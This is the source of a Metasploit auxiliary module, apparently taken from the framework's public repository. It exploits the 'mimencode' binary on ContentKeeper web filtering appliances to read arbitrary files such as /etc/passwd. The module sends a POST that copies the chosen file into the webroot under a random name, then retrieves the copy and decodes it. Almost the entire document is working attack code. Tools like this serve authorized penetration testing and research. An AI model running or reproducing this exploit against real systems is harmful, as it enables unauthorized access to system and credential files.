Path: blob/master/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Scanner89def initialize10super(11'Name' => 'ContentKeeper Web Appliance mimencode File Access',12'Description' => %q{13This module abuses the 'mimencode' binary present within14ContentKeeper Web filtering appliances to retrieve arbitrary15files outside of the webroot.16},17'References' => [18[ 'OSVDB', '54551' ],19[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],20],21'Author' => [ 'aushack' ],22'License' => MSF_LICENSE,23'Notes' => {24'Stability' => [CRASH_SAFE],25'SideEffects' => [IOC_IN_LOGS],26'Reliability' => []27}28)2930register_options(31[32OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),33OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),34]35)36end3738def run_host(_ip)39tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traversal data in a hard-to-brute filename, just in case.4041print_status("Attempting to connect to #{rhost}:#{rport}")42res = send_request_raw(43{44'method' => 'POST',45'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE']46}, 2547)4849if res && res.code == 50050print_good("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")5152file = send_request_raw(53{54'method' => 'GET',55'uri' => '/' + tmpfile56}, 2557)5859if file && (file.code == 200)60print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")61elsif file && file.code62print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")63end64elsif res && res.code65print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")66end67rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e68vprint_error(e.message)69rescue ::Timeout::Error, ::Errno::EPIPE => e70vprint_error(e.message)71end72end737475